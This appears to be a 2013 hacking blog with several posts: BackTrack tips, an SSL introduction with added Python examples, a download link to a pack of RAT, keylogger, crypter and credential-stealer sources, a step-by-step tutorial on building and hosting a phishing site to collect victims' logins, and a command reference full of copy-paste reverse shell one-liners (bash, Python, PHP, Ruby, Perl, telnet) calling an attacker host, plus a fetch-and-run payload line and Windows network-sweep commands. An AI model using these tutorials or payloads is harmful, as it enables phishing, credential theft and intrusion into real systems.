Friday, May 31, 2013

USEFUL THINGS IN BACKTRACK LINUX



Here are the five most useful things to know about BackTrack Linux.


1. Username and password. BackTrack uses root as the username and toor as the password; you are asked for them the first time you log in after installing. Change that password straight away with passwd, otherwise every BackTrack box on the network shares the same root credentials and anyone who can reach it can log in.


2. The startx command. Don't be surprised by a black screen with only a command prompt: BackTrack is designed to be used from the command line. If you want the graphical desktop, type startx after logging in.


3. Metasploit Framework. The best-known tool in BackTrack is the Metasploit Framework, used for penetration testing against vulnerable systems. You start it by running /pentest/exploits/framework3/msfconsole; the older 2.x branch is at /pentest/exploits/framework2/msfconsole.


4. Log out. In BackTrack you cannot restart or shut down the computer from the X desktop. When you are finished in X, log out: click the Dragon icon at the bottom left of the screen and then click Log Out.


5. Shutdown and restart. After logging out of X you are back at the terminal. To shut BackTrack down: poweroff. To restart: reboot. That's it, very simple; try it yourself.

EVILGRADE 2.0 ERROR ON BACKTRACK 5 - SOLVED




I'm running Evilgrade on BackTrack 5. Evilgrade is a modular framework that lets you take advantage of poor software-update implementations by injecting fake updates.


It comes with pre-made binaries (agents), a working default configuration for fast pentests, and its own WebServer and DNSServer modules. New settings are easy to add, and new binary agents are configured automatically.


When I try to run Evilgrade (./evilgrade), I get this error:


./evilgrade


Can't locate Data/Dump.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.1 /usr/local/share/perl/5.10.1 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at isrcore/Shell.pm line 28.


The message means the Perl module Data::Dump is not installed, not that Evilgrade itself is broken. To fix it, run

cpan Data::Dump

in your terminal. Since BackTrack 5 is Ubuntu-based, apt-get install libdata-dump-perl installs the same module from the distribution's packages without pulling in the CPAN toolchain. Finished.

SECURE SOCKETS LAYER (SSL) - AN INTRODUCTION



In the OSI reference model the layer responsible for end-to-end transmission of data is the transport layer. SSL sits directly above it, between the transport layer and the application protocol (HTTP, SMTP, IMAP and so on), which is why it is often loosely described as transport-layer security: it protects the data in transit without the application protocol having to change.


So what actually makes the transmission secure and protects the data from an intruder?


Have you noticed that most websites start with http:// while money-transfer sites and other important websites use https://? The point is clear: https means a secure connection, so the data that travels over it is protected by cryptographic techniques.



SSL, the Secure Sockets Layer (its modern successor is TLS, Transport Layer Security, and the two names are used interchangeably), is a family of cryptographic protocols that provide secure communication over the Internet. And what is cryptography? "Cryptography is the science of secret communication."
SSL uses two kinds of keys. During the handshake the server presents a certificate containing its public key, which everyone may know, and proves it holds the matching private key, which only the server knows; this authenticates the server and lets both sides agree on a session key. The actual data is then encrypted with that symmetric session key, which both sides share and which never travels over the wire in the clear.


Figure: HTTP vs HTTPS



The first picture shows that when Alice sends confidential information over an insecure channel, there is a chance for an attacker to sniff it (credit card details, passwords and so on). The attacker can easily read, understand and use the data for illegal activities because a plain HTTP connection transfers everything in clear text, with no encryption at all.




Now consider the second picture, where the user sends information over a secure channel, that is HTTPS: the data is encrypted first and only then sent over the channel, so an attacker who sniffs the traffic cannot make sense of it.


The broad picture shows that HTTPS is secure, but what makes it secure? The secure sockets layer. A website enables HTTPS by obtaining an SSL certificate for its hostname from a certificate authority that browsers trust, installing it together with the matching private key on the web server, and serving the site on port 443. Note that encryption alone is only half of it: the browser must also check that the certificate really belongs to the site it is talking to, otherwise an attacker in the middle can present his own certificate and read everything.

Where there's a will there's a way. Following that quote, researchers have found ways to attack SSL deployments too. We will post an article on attacking SSL later on.
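As an added example (this is not code from the original post nor from any SSL library), the point that encryption without certificate verification gives no real security, shown as two Python ssl client contexts, a weak one and a hardened one, with a check that tells them apart. The probe() helper at the end is an assumption of this example: it needs network access and a real hostname (none is given here) and reports what the server negotiated and who it claims to be; the context checks themselves run offline.

```python
import socket
import ssl
from typing import Optional


def weak_context() -> ssl.SSLContext:
    """Encrypts but does NOT authenticate the server: any certificate is
    accepted. A passive sniffer cannot read the traffic, but a
    man-in-the-middle can present his own certificate, decrypt, and
    re-encrypt towards the real site. This is what "ignore certificate
    errors" amounts to."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def hardened_context(cafile: Optional[str] = None) -> ssl.SSLContext:
    """Require a certificate that chains to a trusted CA (the system
    store, or cafile), require its name to match the host we asked for,
    and refuse SSLv3/TLS 1.0/TLS 1.1, which have known weaknesses."""
    ctx = ssl.create_default_context(cafile=cafile)   # CERT_REQUIRED + check_hostname
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def context_is_safe(ctx: ssl.SSLContext) -> bool:
    """The three properties a client context must have before the
    connection deserves the word "secure" in HTTPS."""
    return bool(ctx.verify_mode == ssl.CERT_REQUIRED
                and ctx.check_hostname
                and ctx.minimum_version >= ssl.TLSVersion.TLSv1_2)


def probe(host: str, port: int = 443, ctx: Optional[ssl.SSLContext] = None) -> dict:
    """Connect, complete the handshake and report what was negotiated and
    who the server claims to be. With the hardened context a wrong or
    untrusted certificate raises ssl.SSLCertVerificationError instead of
    silently continuing. Hypothetical helper; needs network access."""
    ctx = ctx or hardened_context()
    with socket.create_connection((host, port), timeout=10) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            cert = tls.getpeercert()
            return {
                "protocol": tls.version(),
                "cipher": tls.cipher()[0],
                "subject": dict(pair[0] for pair in cert.get("subject", ())),
                "issuer": dict(pair[0] for pair in cert.get("issuer", ())),
                "not_after": cert.get("notAfter"),
            }


if __name__ == "__main__":
    import sys
    print(probe(sys.argv[1]))
```

Run it as python tls_probe.py some.host to see the protocol version, cipher suite and certificate subject a real server presents; swap in weak_context() to see that the same handshake still "succeeds" against any certificate at all, which is exactly the gap a man-in-the-middle exploits.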

Thursday, May 30, 2013

C# COLLECTION OF SOURCE CODES – MEGA PACK



I am posting a new pack, this time with C/C++ sources. Many people asked me for a C/C++ pack, so here it is; you can learn a lot from it. Note that most of these are sources of RATs, bots, crypters, binders and credential stealers: unpack and build them only inside an isolated analysis VM, never on the machine you work from.

The pack contains the following sources:
------------------------------------------------

Port Scanner
Dark Crypter
FireFox 3.6 Decrypter
Agony
Aryan RAT v0.3
Aryan RAT v0.4
Aryan RAT v0.5
Basic Keylogger Source
Black Sun
BlindSpot v1.0 (Binder)
Files Merger
Call Of Duty 6 - Modern Warfare 2 - MPHack
Cryptic3 Crypter
DCI Bot
Down Trojan RAT
Client RAT
El Backdoor Small v1/2.0
Example Drag&Drop
F0xit 0.1
FBI RAT
gh0st 3.6
Harvecter bot
hBot Source
JABT1.2 - Justin Another Binder Tool
Juu2 IE7+FF steal
Little Joiner
Loading DLL infect PE
LocustPEA
Mail Sender - C++
Dump MSN Contacts
Nerzhul
Net Bot Attacker 5.5 RAT+DDOS
Polymorphic crypter
ProAgent V1.21
PsyRAT 2
Rat-b
Ratling
Reptile Bot
Rhapsody reverse connecting RAT
ri0tv5 Bot
UDP Tunnel
SpecialTrojan V5.0
Viotto OCX registrator - Source


Download link (mega pack of source codes):



MediaFire

Wednesday, May 22, 2013

How to make your computer a Server to host a website (Hosting a phishing website)

Steps to make your computer a server to host website from home:





1. Download WampServer and install it on your computer. If you don't know what it is, WampServer is a simple Windows server bundle with Apache, PHP and MySQL that is fully capable of hosting sites on your home computer.


2. Create your website. If you want to make a phishing website in a few minutes, with both a fake login page and the PHP script, read my earlier article, Start phishing any site in less than 5 minutes.


3. Copy the folder that contains your website or phishing files into the "www" directory inside the "wamp" folder. Typically this is C:\wamp\www.


4. Now open your browser and type "http://localhost" in the address bar. You will see the WampServer home page. Scroll down and click on the folder you copied into the www directory. That's it, your website is running.


5. Wait, right now it can only be viewed from your own computer. To make it visible to the world, click the WampServer icon in the taskbar and then click "Put Online". Be aware that this exposes everything under www to the Internet, not just your folder.


6. If you have a dynamic IP address, which makes hosting awkward because the address keeps changing, go to DynDNS.org. This service gives you a host name for a dynamic IP address for free. Register with dyndns.org and get a host name for your computer; when your IP address changes, the update client automatically points the host name at the new address.


7. If you are behind a router, log in to the router and, in the port-forwarding section, forward external TCP port 80 to port 80 on the LAN IP address of the computer running WampServer. Without this, traffic from the Internet reaches the router and stops there.


That's it. If you follow these steps, you have made your computer a server that hosts a phishing website or a legitimate website from home, within an hour. Enjoy!

Start phishing any site in less than 5 minutes

Phishing is certainly an exciting weapon in any hacker's arsenal. It is pure social engineering: the art of tricking the user into thinking a page is the legitimate website while we silently store the login information. So today I am writing a tutorial on how to set up a complete phishing site, so that you can start phishing in less than 5 minutes. Let's start.


First of all, you need an exact replica of the website you are going to phish. Don't worry, we will use a simple tool that does all of that. Secondly, you need a PHP script that logs all the information the user types into the form. That's it.



Download "automatic phish creator". The password of the rar file is "hackingguide". All you need to do is fill in the name of the website you want to phish, the name of the PHP file you want generated and the name of the log file you want. The phish creator then creates an exact replica of the website and the PHP script. That's it, you are ready to start phishing.


Now you need to host the files on a server. You can use t35.com, awardspace.com or any similar host and register free hosting space, or you can buy space; it's your choice. Go to the control panel and upload your two files. Then make the log file writable by the web server. Many guides say to set the permission to "777", i.e. full permission for everyone; only the log file needs to be writable, and on a shared host 777 makes your files writable by every other account on the box, so give the script itself no more than 644. Now your site is ready. Send the link to your victims, and when people type in their credentials thinking it's the real site, you will have their username and password. It is that easy.


Note: antivirus software will usually flag the phish creator, because it generates credential-harvesting code; that is expected. Rather than switching the antivirus off on the machine you work from, run the tool inside an isolated virtual machine.

Tuesday, May 21, 2013

BACKBOX LINUX 3.0






A Linux distribution based on Ubuntu


BackBox is a Linux distro based on the Ubuntu operating system, developed to perform security assessments and penetration tests.

BackBox is designed to be easy to use and fast. It provides a minimal but powerful and complete desktop environment.

What's new in this release:

· System upgrade
· Bug corrections
· Performance boost
· Improved start menu
· Improved Wi-Fi drivers (compat-wireless, aircrack patched)
· New and updated hacking tools


HOW TO INSTALL FLASHPLAYER ON BACKTRACK 5







Install Flash Player on BackTrack 5 R2 step by step

Download the file below and click Save to save the archive, as shown in the screenshot.

DOWNLOAD flash_player_10_linux.tar


Now type the command below in a terminal. Make sure you are in the directory you downloaded to first; run ls if needed to check, and use the name of the file you actually saved (the archive Adobe ships is a gzip-compressed tar, hence the z flag).

tar xvfz install_flash_player_10_linux.tar.gz


The result should look like the screenshot below if it went correctly.



Keep the terminal open and type the command below. The -p flag also creates ~/.mozilla if it does not exist yet, which is the case on a fresh install where Firefox has never been started.

mkdir -p ~/.mozilla/plugins



Last but not least, type the command shown below into the same terminal window and press Enter. Firefox picks the plugin up the next time it starts.

mv -f libflashplayer.so ~/.mozilla/plugins/



That's it, Flash Player should now be installed and working. Keep in mind that a browser plugin is attack surface on the testing box too, so install the current version rather than an old one and keep it updated. Hope you enjoyed this tutorial and that it helps someone out.
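As an added example (not part of the original post), the same three steps, extract, create the plugin directory and move the library, done from Python with one check the manual commands skip: tar writes wherever the archive tells it to, so the script lists the members first and refuses an archive containing absolute paths or ".." components. The archive and member names (install_flash_player_10_linux.tar.gz, libflashplayer.so) come from the post; the function names, the scratch directory and the two archives that demo() builds are assumptions made here, and the "shared object" inside them is a placeholder, not a real plugin.

```python
import io
import os
import tarfile
import tempfile
from pathlib import Path


def unsafe_members(archive: str) -> list:
    """Names of members that would write outside the extraction directory:
    absolute paths, '..' components, and links whose target does so. The
    link check is deliberately conservative."""
    bad = []
    with tarfile.open(archive) as tar:
        for m in tar.getmembers():
            p = Path(m.name)
            if p.is_absolute() or ".." in p.parts:
                bad.append(m.name)
            elif m.issym() or m.islnk():
                target = Path(m.linkname)
                if target.is_absolute() or ".." in (p.parent / target).parts:
                    bad.append(m.name)
    return bad


def install_plugin(archive: str, plugin_dir, plugin_name: str = "libflashplayer.so") -> Path:
    """Extract the archive into a scratch directory beside plugin_dir and
    move plugin_name into plugin_dir (mkdir -p; tar xvfz; mv -f).
    Raises ValueError for a hostile archive and FileNotFoundError if the
    plugin is not in it."""
    bad = unsafe_members(archive)
    if bad:
        raise ValueError(f"refusing to extract {archive}: {bad}")
    plugin_dir = Path(plugin_dir)
    plugin_dir.mkdir(parents=True, exist_ok=True)          # mkdir -p ~/.mozilla/plugins
    scratch = plugin_dir.parent / ".plugin-extract"
    scratch.mkdir(parents=True, exist_ok=True)
    # Newer Pythons ship their own traversal filter; use it when present.
    kwargs = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
    with tarfile.open(archive) as tar:
        tar.extractall(scratch, **kwargs)                  # tar xvfz ...
    src = scratch / plugin_name
    if not src.is_file():
        raise FileNotFoundError(f"{plugin_name} not found in {archive}")
    dest = plugin_dir / plugin_name
    os.replace(src, dest)                                  # mv -f libflashplayer.so ~/.mozilla/plugins/
    return dest


def demo() -> dict:
    """Constructed input: build a benign archive holding libflashplayer.so
    and a hostile one with a '../' member inside a temp dir, install the
    first and show that the second is rejected."""
    work = Path(tempfile.mkdtemp(prefix="plugin-demo-"))

    def build(path: Path, names: list) -> None:
        with tarfile.open(path, "w:gz") as tar:
            for name in names:
                data = b"constructed placeholder, not a real shared object"
                info = tarfile.TarInfo(name)
                info.size = len(data)
                tar.addfile(info, io.BytesIO(data))

    benign = work / "install_flash_player_10_linux.tar.gz"
    build(benign, ["libflashplayer.so", "readme.txt"])
    hostile = work / "hostile.tar.gz"
    build(hostile, ["../../.bashrc", "libflashplayer.so"])

    installed = install_plugin(str(benign), work / "home" / ".mozilla" / "plugins")
    try:
        install_plugin(str(hostile), work / "home2" / ".mozilla" / "plugins")
        rejected = []
    except ValueError:
        rejected = unsafe_members(str(hostile))
    return {"installed": str(installed), "installed_exists": installed.is_file(),
            "rejected": rejected}


if __name__ == "__main__":
    home = Path.home()
    print(install_plugin("install_flash_player_10_linux.tar.gz", home / ".mozilla" / "plugins"))
```

The hostile archive in demo() is the classic trick: a member named ../../.bashrc that, extracted naively from ~/Downloads, overwrites a file in the home directory. Listing members before extracting (tar tzf on the command line) is the equivalent manual check.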

Sunday, May 12, 2013

Linux Hackers Command Reference

Linux Command Reference for Pen-testers



This part of the blog is dedicated to Linux and Unix-like commands that Penetration Testers (so, who is your tester?) and Information Security Administrators can use. On this page I will periodically post small Linux scripts and commands that a penetration tester or a security administrator can use to:


1. Perform security administration tasks (e.g. use Windows/Linux netcat to bind shells, etc.).

2. Run vulnerability scans (e.g. identify null sessions, test for LANMAN services, etc.).

3. Pivot (e.g. after compromising a machine, use its own tools to escalate, etc.).



Using Netcat to Bind Shell




Launching a listening shell on Windows and connecting to it from Linux:

nc.exe -L -p <listening port> -e cmd.exe - Run on the Windows box (-L keeps listening after the client disconnects)

nc <windows box ip> <windows port> - Run on the Linux/Unix-like box

Launching a listening shell on Linux/Unix-like and connecting to it from Windows:

nc -l -p <listening port> -e /bin/sh - Run on the Linux/Unix-like box (needs the "traditional" netcat built with -e; the OpenBSD variant lacks it)

nc.exe <linux box ip> <linux port> - Run on the Windows box


Using Netcat to transfer files


Transferring any type of file from Linux to Windows (the receiver listens, the sender connects):

nc.exe -lvvp 4444 > output.txt - Run on the Windows box
cat input.txt | nc -vv 192.168.8.74 4444 - Run on the Linux/Unix-like box


Transferring any type of file from Windows to Linux:

nc -lvvp 4444 > output.exe - Run on the Linux box
type input.exe | nc.exe -vv <linux box ip> 4444 - Run on the Windows box


Note:
You might want to run the file command to identify the type of the file you have transferred, and compare a checksum of both copies (md5sum on Linux), since netcat gives no indication of a truncated transfer. There is no difference between transferring binary and text files; both go over the wire byte for byte.


Using Netcat for port scanning 

nc -v -n -z -w 1 192.168.1.2 1-1000 - Run from a Linux/Unix-like box
nc.exe -v -n -z -w 1 192.168.1.2 1-1000 - Run from a Windows box


Note: the "-n" parameter prevents DNS lookups, "-z" puts nc in zero-I/O mode (it only reports whether the connection succeeded and sends no data), and "-w 1" times the connection out after 1 second. The commands above scan TCP ports 1 to 1000; add -u for UDP.

Using Python to get shell

This was tested under Linux / Python 2.7:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
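The one-liner above works because of its three os.dup2() calls: once descriptors 0, 1 and 2 all refer to the connected socket, /bin/sh reads its commands from the attacker and writes its output back without knowing a network is involved. As an added example (not part of the original post), the script below reproduces that mechanism locally over a socketpair instead of a TCP connection, so it runs offline; the TCP version differs only in how the socket is obtained. The function names are assumptions made here, and the second function shows the defender's view of the same fact: a shell whose stdin is a socket.

```python
import os
import socket
import subprocess


def run_over_socket(cmd, stdin_data=b""):
    """Fork, bind the child's stdin/stdout/stderr to one end of a
    socketpair exactly as the one-liner does, run cmd, and return
    (everything the child wrote, exit status) read from the other end."""
    parent, child = socket.socketpair()
    pid = os.fork()
    if pid == 0:                          # child: the "victim" side
        parent.close()
        fd = child.fileno()
        os.dup2(fd, 0)                    # stdin  <- socket
        os.dup2(fd, 1)                    # stdout -> socket
        os.dup2(fd, 2)                    # stderr -> socket
        rc = subprocess.call(cmd)
        os._exit(rc)
    child.close()                         # parent: the "attacker" side
    if stdin_data:
        parent.sendall(stdin_data)        # what the attacker types
    parent.shutdown(socket.SHUT_WR)       # EOF, so a shell exits instead of waiting
    chunks = []
    while True:
        data = parent.recv(4096)
        if not data:
            break
        chunks.append(data)
    parent.close()
    _, status = os.waitpid(pid, 0)
    return b"".join(chunks).decode(errors="replace"), os.WEXITSTATUS(status)


def shell_stdin_description():
    """Ask the shell what its own stdin is. On Linux the answer is
    'socket:[inode]', which is also how a defender spots a reverse shell:
    ls -l /proc/<pid>/fd of a shell should not show sockets on 0, 1, 2.
    Returns None where /proc is not available."""
    if not os.path.exists("/proc/self/fd"):
        return None
    out, _ = run_over_socket(["/bin/sh", "-c", "readlink /proc/self/fd/0"])
    return out.strip()


if __name__ == "__main__":
    out, rc = run_over_socket(["/bin/sh"], b"id\nuname -a\n")
    print(out, "exit status", rc)
    print("shell's stdin is:", shell_stdin_description())
```

Because stdout and stderr are the same descriptor, error messages travel back over the same channel as normal output, which is why the one-liner does not need a separate connection for them (the two-connection telnet trick further down exists precisely because plain telnet cannot do this).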

Using PHP to get shell

This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6…

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'


Using Ruby to get shell

This is a reverse shell: it connects back to 10.0.0.1 port 1234 and attaches /bin/sh to the socket (handy when Ruby is installed on the victim machine):

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' 
Using Java to get shell 
The following code connects back to 10.0.0.1 port 2002 and runs bash with its descriptors attached to the socket (the "as String[]" array syntax is Groovy, so it works as-is in a Groovy-based script console):

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()


Using Perl to get shell

And a shorter Perl reverse shell that does not depend on /bin/sh:

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 

If the target system is running Windows use the following one-liner:

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Alternatives to Bash Shell

Here are some tricks taken from Bernardo Damele's blog to play with.

exec /bin/bash 0&0 2>&0

Or:

0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

Or:

exec 5<>/dev/tcp/attackerip/4444
cat <&5 | while read line; do $line 2>&5 >&5; done # or:
while read line 0<&5; do $line 2>&5 >&5; done


Using Telnet to get shell


Of course, you can also use Telnet as an alternative to Netcat. Telnet cannot attach a program to the connection, so a named pipe carries the shell's output back:

rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0</tmp/p | /bin/bash 1>/tmp/p

Or, when no named pipe can be created, with two connections (one carries the commands, the other the output):

telnet attackerip 4444 | /bin/bash | telnet attackerip 4445 

Note: remember to listen on your machine on port 4445/tcp as well.

Using sbd to get shell

An article on http://www.secureit.co.il discussed the availability of sbd (Shadowinteger's Backdoor), available at http://cycom.se/dl/sbd. It is described as a "Netcat clone, designed to be portable and offer strong encryption". It supports AES-128 encryption and is available on most platforms, including win32 and Linux. In the examples below -l listens, -p sets the port, -c on/off toggles encryption (both ends must use the same setting and, with encryption on, the same shared secret), -e runs a program on connection, -r n respawns the listener after n seconds and -m on monitors the traffic.
Listening on Windows without encryption: sbd.exe -l -p 5555 -c off
Listening on Windows with encryption: sbd.exe -l -p 5555 -c on
Binding a shell on a Windows machine with encryption: sbd.exe -l -p 5555 -c on -e cmd.exe
Binding a shell on a Windows machine without encryption: sbd.exe -l -p 5555 -c off -e cmd.exe
Connecting from Linux to Windows without encryption: sbd 192.168.11.21 5555 -c off
Connecting from Linux to Windows with encryption: sbd 192.168.1.21 5555 -c on
This command monitors the traffic on the server side and respawns the listener immediately: sbd -m on -r 0 -l -p 100 -e cmd.exe
This command sets up port forwarding through a local shell: sbd 127.0.0.1 2000 | cmd.exe | sbd 127.0.0.1 3000
This command performs connection forwarding from local port 90 to a remote web server: sbd -vv -l -p 90 | sbd -c off www.radarhack.com 80

Note:
The example of the reverse shell should prove that a decent configuration of firewalls in the outbound direction is necessary. In the scenario that a Trojan can be installed on a webserver, it is very important to prevent that this server can connect back out of the network, resulting in a shell for the attacker.

Using sbd to transfer file

For file receiving in Windows the command is: sbd.exe –l –p 5555 > output.txt
For file sending in Linux the command is: cat input.txt | sbd 192.168.11.21 5555


Note: there is no difference between transferring an executable and a plain text file.

Using sbd to respawn the shell

Another interesting feature of sbd is the -r option, which respawns the listener. Normally the server side exits the moment the client disconnects. With -r seconds the server listens again after the specified delay, so the backdoor does not die with the first connection and you can reconnect. A delay of 0 seconds respawns the server immediately.
Here is a typical interaction with sbd respawning the shell after the connection is dropped (-P sets the prefix shown in front of the lines each side sends):

sbd -r 8 f -P server -l -p 100

demolisher: test1

demolisher: test2

sbd -P demolisher 127.0.0.1 100

test1

^C

sbd -P demolisher 127.0.0.1 100

connect(): WSAECONNREFUSED

sbd -P demolisher 127.0.0.1 100

connect(): WSAECONNREFUSED

... after 8 seconds ....

sbd -P demolisher 127.0.0.1 100

test2

After evaluating it (playing with it, in other words), the tool seems very useful and easy to use. It has far fewer features than netcat, but it offers built-in encryption, which can help evade IDS/IPS inspection, although some systems will still flag the behaviour, for instance encrypted traffic on well-known ports.

Useful commands for copy paste

nc <attacker_ip> <port> -e /bin/bash
mknod backpipe p; nc <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
/bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1
mknod backpipe p; telnet <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port>
wget -O /tmp/bd.php <url_to_malicious_file> && php -f /tmp/bd.php

References:
http://pentestmonkey.net (reverse shell cheat sheet)
http://wikipedia.org
Bernardo Damele's blog (reverse shell one-liners)

Windows Auditing


Introduction 

This post is a comprehensive list of the things you would want to check while conducting Windows auditing.

Step 1:

Explanation: List all installed programs (after you cd to C:\Program Files; on 64-bit Windows also check C:\Program Files (x86))

Command: dir /n > Path\<output-file> (do not add /p: it pauses for a keypress, which hangs the command when the output is redirected)
Command: tree /A /F > Path\<output-file>


Step 2:

Explanation: List security policies

Command: auditpol /get /category:* (as Administrator)
Command: auditpol /backup /file:c:\<output>.csv (as Administrator)

Step 3a:

Explanation: List Windows running/stopped services

Command: sc query type= service > Path\<output-file> (running services only; note the space after "type=")
Command: sc query type= service state= inactive > Path\<output-file>
Command: sc query type= service state= all > Path\<output-file> (running and not running)
Command: net start > Path\<output-file>


Step 3b:

Explanation: List the privileges a Windows service runs with

Command: sc qprivs <service name> > Path\<output-file>


Step 4:

Explanation: Identifying the windows security patches using WMIC

Command: wmic qfe get description,installedOn > Path\<output-file>


Step 5:

Explanation: List Windows processes with relevant information

Command: wmic process > Path\<output-file>
Command: wmic process list brief > Path\<output-file>
Command: wmic process list full > Path\<output-file>
Command: wmic process list system > Path\<output-file>


Step 6:

Explanation: List Windows startup programs

Command: wmic startup > Path\<output-file>
Command: wmic startup list full > Path\<output-file>
Command: wmic startup list brief > Path\<output-file>
Command: wmic startup list system > Path\<output-file>


Step 7:
Explanation: List Windows current connections with the owning executable

Command: netstat -nab > Path\<output-file> (run from an elevated prompt, otherwise -b fails)

Saturday, May 11, 2013

Windows Hackers Command Reference

Windows Command Reference for Pen-testers





This part of the blog is dedicated to Windows commands that Penetration Testers (so, who is your tester?) and Information Security Administrators can use. On this page I will periodically post small Windows scripts and commands that a penetration tester or a security administrator can use to:

1. Perform security administration tasks (e.g. enforce patches, silently uninstall software, etc.).

2. Run vulnerability scans (e.g. identify null sessions, test for LANMAN services, etc.).

3. Pivot (e.g. after compromising a machine, use its own Windows tools to escalate, etc.).



Test for installed patches 

To run WMIC, open a command prompt and type wmic; you immediately get an interactive WMI shell running with the privileges of that prompt (open it as Administrator for anything that changes state).

Identifying the Windows security patches using WMIC
wmic qfe get description,installedOn

Note: this produces a long list of Windows patches and when they were installed, printed to stdout. That way you know exactly which patches are missing, so you know how to attack the workstation or what to remediate on it.


Identifying windows services 

1.  sc query type= service (running services) 
2. sc query type= service state= inactive (exist but don't run)
3. sc query type= service state= all (running and not running)


Identifying windows startup programs

These commands report the startup programs: 

1. wmic startup
2. wmic startup list full
3. wmic startup list brief
4. wmic startup list system


Note: these commands produce a list of all startup programs along with their registry keys, a description and the program name; the options above vary the amount of output. Very interesting when doing malware behavioural analysis. 

1. wmic /node:machinename startup list full
2. wmic STARTUP GET Caption, Command, User

Note: remotely list startup apps (the second form selects only the interesting columns)


Identifying windows network cards 

WMIC can also give you lots of information about the network cards and drivers: 

1. wmic nicconfig list
Note: that will list the configuration of every network adapter, drivers included 

1. wmic nicconfig where IPEnabled='true'

Note: That will give you a list of IP interfaces. 

1. wmic nicconfig where index=9 call enablestatic("192.168.16.4"), ("255.255.255.0")

Note: this sets a static IP address and netmask on the adapter with index 9 

1. wmic nicconfig where index=9 call setgateways("192.168.16.4", "192.168.16.5"),(1,2)

Note: this changes the default gateways (with their metrics) on adapter 9 

1. wmic nicconfig where index=9 call enabledhcp

Note: This will enable DHCP. 

1. wmic service where caption="DHCP Client" call changestartmode "Disabled"
2. wmic service where caption="DHCP Client" call changestartmode "Automatic"
3. wmic service where caption="DHCP Client" call changestartmode "Manual"
Note: these set the start mode of the DHCP Client service to Disabled, Automatic or Manual. 

1. wmic /node:machinename nicconfig where Index=1 call EnableDHCP

Note: Remotely change IP to use DHCP 

1. wmic /node:machinename nicconfig where Index=1 call EnableStatic ("172.16.10.10"), ("255.255.0.0")

Note: Remotely change the IP to a static IP (Index is Interface#)



Handle Windows Process life-cycle 

The following sets of commands let you handle every kind of process manipulation: 

1. wmic process
2. wmic process list brief
3. wmic process list full
4. wmic process list system

Note: The above commands list processes in a windows machine. 

1. wmic /record:processes.xml process list brief
2. wmic /record:processes.xml process list full
3. wmic /record:processes.xml process list system

Note: After the command runs, your results are stored in xml format. That's the only format supported, but this is a handy record of what you typed, when you typed it, and the results you got. 

1. wmic process where name='process_name.exe'
2. wmic process where name='process_name.exe' list brief
3. wmic process where name='process_name.exe' list full
4. wmic process where name='process_name.exe' list system
5. wmic process where name='process_name.exe' delete

Note: the above commands search for and kill processes by name (delete terminates every process with that name). 

1. wmic process | more


Note: Displays all processes per screen page 

1. wmic process | findstr "process name"

Note: The above command searches a process name, or process information per line.

1. wmic /output:wmic.html process list full /format:hform

Note: List running processes and output to HTML/XSL form. 

1. wmic /node:machinename process list brief /every:1

Note: Remotely list running processes every second 

1. wmic process where name="cmd.exe" call getowner
2. wmic process where name="cmd.exe" call getownersid

Note: get the process owner or owner SID. Useful for choosing a process to migrate into with Metasploit.


ICMP and DNS network sweeping 


After taking over a Windows box you can use it as a pivot, but what happens if it is a restricted box and you cannot download or upload any tools? The following built-in commands will do the job (inside a .bat file write %%I instead of %I): 

for /L %I in (1,1,254) DO @ping -n 1 192.168.1.%I | findstr "TTL=128" >> pinglog.txt

Note: this loop pings each address once and records the replies whose TTL is 128, the default of Windows hosts on the local segment. To catch Linux hosts or network devices (TTL 64 or 255) match on "TTL=" instead. The output of the loop is stored in a file named pinglog.txt. 

for /L %I in (1,1,254) DO @nslookup 192.168.1.%I | find "Name:" >> dnslog.txt
Note: this loop performs a reverse DNS lookup of every address using the local DNS server (an external DNS server can be used as well). The output is stored in a log file called dnslog.txt.
pathping targethost (for a single host only) 

for /L %I in (1,1,254) DO @pathping -n 192.168.1.%I >> traceping.txt

Note: pathping combines the functions of ping and tracert. It first lists the hops needed to reach the address under test, then sends multiple pings to each router between you and the destination and computes results from the packets each router returns. Because pathping displays the degree of packet loss at any given router or link, you can determine which routers or subnets might be having network problems. Note that the whole process may take 5-10 minutes per host because many pings are sent; the switches that modify this are listed by "pathping /?". The loop above maps the whole network along with the routes to it (this is going to be verbose).

for /L %I in (1,1,254) DO @echo -Route: %I- >> trace.txt & @pathping -n 192.168.1.%I >> trace.txt 

Note: this does a simple trace route of the whole local network (-n skips name resolution and takes no argument; pathping has no ping-count switch, so "-n 1" would be rejected).

Windows network connection monitoring 

1. netstat -nab 3 >> netstat.txt

Note: this loops forever, listing all connections and listening ports together with the executable that owns each, refreshing every 3 seconds. More specifically:

1. Option: -n

Displays addresses and port numbers in numerical form 

1. Option: -a

Displays all connections and listening ports

1. Option: -b

